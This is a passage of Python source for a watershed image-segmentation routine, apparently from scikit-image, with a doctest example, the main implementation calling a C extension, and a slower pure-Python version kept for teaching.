Markers can be determined manually, or automatically using for example
the local minima of the gradient of the image, or the local maxima of the
distance function to the background for separating overlapping objects
(see example).
References
----------
.. [1] http://en.wikipedia.org/wiki/Watershed_%28image_processing%29
.. [2] http://cmm.ensmp.fr/~beucher/wtshed.html
Examples
--------
The watershed algorithm is very useful to separate overlapping objects
>>> # Generate an initial image with two overlapping circles
>>> x, y = np.indices((80, 80))
>>> x1, y1, x2, y2 = 28, 28, 44, 52
>>> r1, r2 = 16, 20
>>> mask_circle1 = (x - x1)**2 + (y - y1)**2 < r1**2
>>> mask_circle2 = (x - x2)**2 + (y - y2)**2 < r2**2
>>> image = np.logical_or(mask_circle1, mask_circle2)
>>> # Now we want to separate the two objects in image
>>> # Generate the markers as local maxima of the distance
>>> # to the background
>>> from scipy import ndimage as ndi
>>> distance = ndi.distance_transform_edt(image)
>>> from skimage.feature import peak_local_max
>>> local_maxi = peak_local_max(distance, labels=image,
... footprint=np.ones((3, 3)),
... indices=False)
>>> markers = ndi.label(local_maxi)[0]
>>> labels = watershed(-distance, markers, mask=image)
The algorithm works also for 3-D images, and can be used for example to
separate overlapping spheres.
"""
if connectivity is None:
c_connectivity = ndi.generate_binary_structure(image.ndim, 1)
else:
c_connectivity = np.array(connectivity, bool)
if c_connectivity.ndim != image.ndim:
raise ValueError("Connectivity dimension must be same as image")
if offset is None:
if any([x % 2 == 0 for x in c_connectivity.shape]):
raise ValueError("Connectivity array must have an unambiguous "
"center")
#
# offset to center of connectivity array
#
offset = np.array(c_connectivity.shape) // 2
# pad the image, markers, and mask so that we can use the mask to
# keep from running off the edges
pads = offset
def pad(im):
new_im = np.zeros(
[i + 2 * p for i, p in zip(im.shape, pads)], im.dtype)
new_im[[slice(p, -p, None) for p in pads]] = im
return new_im
if mask is not None:
mask = pad(mask)
else:
mask = pad(np.ones(image.shape, bool))
image = pad(image)
markers = pad(markers)
c_image = rank_order(image)[0].astype(np.int32)
c_markers = np.ascontiguousarray(markers, dtype=np.int32)
if c_markers.ndim != c_image.ndim:
raise ValueError("markers (ndim=%d) must have same # of dimensions "
"as image (ndim=%d)" % (c_markers.ndim, c_image.ndim))
if c_markers.shape != c_image.shape:
raise ValueError("image and markers must have the same shape")
if mask is not None:
c_mask = np.ascontiguousarray(mask, dtype=bool)
if c_mask.ndim != c_markers.ndim:
raise ValueError("mask must have same # of dimensions as image")
if c_markers.shape != c_mask.shape:
raise ValueError("mask must have same shape as image")
c_markers[np.logical_not(mask)] = 0
else:
c_mask = None
c_output = c_markers.copy()
#
# We pass a connectivity array that pre-calculates the stride for each
# neighbor.
#
# The result of this bit of code is an array with one row per
# point to be considered. The first column is the pre-computed stride
# and the second through last are the x,y...whatever offsets
# (to do bounds checking).
c = []
distances = []
image_stride = np.array(image.strides) // image.itemsize
    for i in range(np.prod(c_connectivity.shape)):
multiplier = 1
offs = []
indexes = []
ignore = True
for j in range(len(c_connectivity.shape)):
idx = (i // multiplier) % c_connectivity.shape[j]
off = idx - offset[j]
if off:
ignore = False
offs.append(off)
indexes.append(idx)
multiplier *= c_connectivity.shape[j]
        if (not ignore) and c_connectivity[tuple(indexes)]:
stride = np.dot(image_stride, np.array(offs))
d = np.sum(np.abs(offs)) - 1
offs.insert(0, stride)
c.append(offs)
distances.append(d)
c = np.array(c, dtype=np.int32)
c = c[np.argsort(distances)]
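    # Worked example (illustrative): with the default cross-shaped 3x3
    # connectivity on a padded 2-D image whose element strides are
    # (ncols, 1), the rows of `c` have the form [flat_stride, dy, dx]:
    #   [-ncols, -1,  0]   # up
    #   [-1,      0, -1]   # left
    #   [ 1,      0,  1]   # right
    #   [ ncols,  1,  0]   # down
    # The argsort above places nearer neighbors (smaller |dy|+|dx|) first.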
pq, age = __heapify_markers(c_markers, c_image)
pq = np.ascontiguousarray(pq, dtype=np.int32)
    if np.prod(pq.shape) > 0:
# If nothing is labeled, the output is empty and we don't have to
# do anything
c_output = c_output.flatten()
if c_mask is None:
c_mask = np.ones(c_image.shape, np.int8).flatten()
else:
c_mask = c_mask.astype(np.int8).flatten()
_watershed.watershed(c_image.flatten(),
pq, age, c,
c_mask,
c_output)
c_output = c_output.reshape(c_image.shape)[[slice(1, -1, None)] *
image.ndim]
try:
return c_output.astype(markers.dtype)
except:
return c_output
# ---------------------- deprecated ------------------------------
# Deprecate slower pure-Python code, that we keep only for
# pedagogical purposes
def __heapify_markers(markers, image):
"""Create a priority queue heap with the markers on it"""
stride = np.array(image.strides) // image.itemsize
coords = np.argwhere(markers != 0)
ncoords = coords.shape[0]
if ncoords > 0:
pixels = image[markers != 0]
age = np.arange(ncoords)
offset = np.zeros(coords.shape[0], int)
for i in range(image.ndim):
offset = offset + stride[i] * coords[:, i]
pq = np.column_stack((pixels, age, offset, coords))
# pixels = top priority, age=second
ordering = np.lexsort((age, pixels))
pq = pq[ordering, :]
else:
pq = np.zeros((0, markers.ndim + 3), int)
return (pq, ncoords)
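# For orientation (derived from the code above): with a 2-D image each pq row
# is (pixel_value, age, flat_offset, row, col), and lexsort((age, pixels))
# sorts by pixel value with ties broken by insertion age -- the same invariant
# the heap maintains during flooding.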
def _slow_watershed(image, markers, connectivity=8, mask=None):
"""Return a matrix labeled using the watershed algorithm
Use the `watershed` function for a faster execution.
This pure Python function is solely for pedagogical purposes.
Parameters
----------
image: 2-d ndarray of integers
a two-dimensional matrix where the lowest value points are
labeled first.
markers: 2-d ndarray of integers
a two-dimensional matrix marking the basins with the values
to be assigned in the label matrix. Zero means not a marker.
connectivity: {4, 8}, optional
either 4 for four-connected or 8 (default) for eight-connected
mask: 2-d ndarray of bools, optional
don't label points in the mask
Returns
-------
out: ndarray
A labeled matrix of the same type and shape as markers
Notes
-----
    This function implements a watershed algorithm [1]_ that apportions pixels
into marked basins. The algorithm uses a priority queue to hold the pixels
with the metric for the priority queue being pixel value, then the time of
entry into the queue - this settles ties in favor of the closest marker.
Some ideas taken from
Soille, "Automated Basin Delineation from Digital Elevation Models Using
Mathematical Morphology", Signal Processing 20 (1990) 171-182
The most important insight in the paper is that entry time onto the queue
solves two problems: a pixel should be assigned to the neighbor with the
largest gradient or, if there is no gradient, pixels on a plateau should
be split between markers on opposite sides.
    Unlike `watershed`, this implementation performs the flooding entirely in
    Python rather than delegating to the C extension.
Markers can be determined manually, or automatically using for example
the local minima of the gradient of the image, or the local maxima of the
distance function to the background for separating overlapping objects.
"""
    if connectivity not in (4, 8):
        raise ValueError("Connectivity was %d: it should be either "
                         "four or eight" % (connectivity))
image = np.array(image)
markers = np.array(markers)
labels = markers.copy()
max_x = markers.shape[0]
max_y = markers.shape[1]
if connectivity == 4:
connect_increments = ((1, 0), (0, 1), (-1, 0), (0, -1))
else:
connect_increments = ((1, 0), (1, 1), (0, 1), (-1, 1),
(-1, 0), (-1, -1), (0, -1), (1, -1))
pq, age = __heapify_markers(markers, image)
pq = pq.tolist()
#
# The second step pops a value off of the queue, then labels and pushes
# the neighbors
#
while len(pq):
pix_value, pix_age, ignore, pix_x, pix_y = heappop(pq)
pix_label = labels[pix_x, pix_y]
for xi, yi in connect_increments:
x = pix_x + xi
y = pix_y + yi
if x < 0 or y < 0 or x >= max_x or y >= max_y:
continue
if labels[x, y]:
continue
if mask is not None and not mask[x, y]:
continue
# label the pixel
labels[x, y] = pix_label
# put the pixel onto the queue
heappush(pq, [image[x, y], age, 0, x, y])
age += 1
return labels
| bsd-3-clause |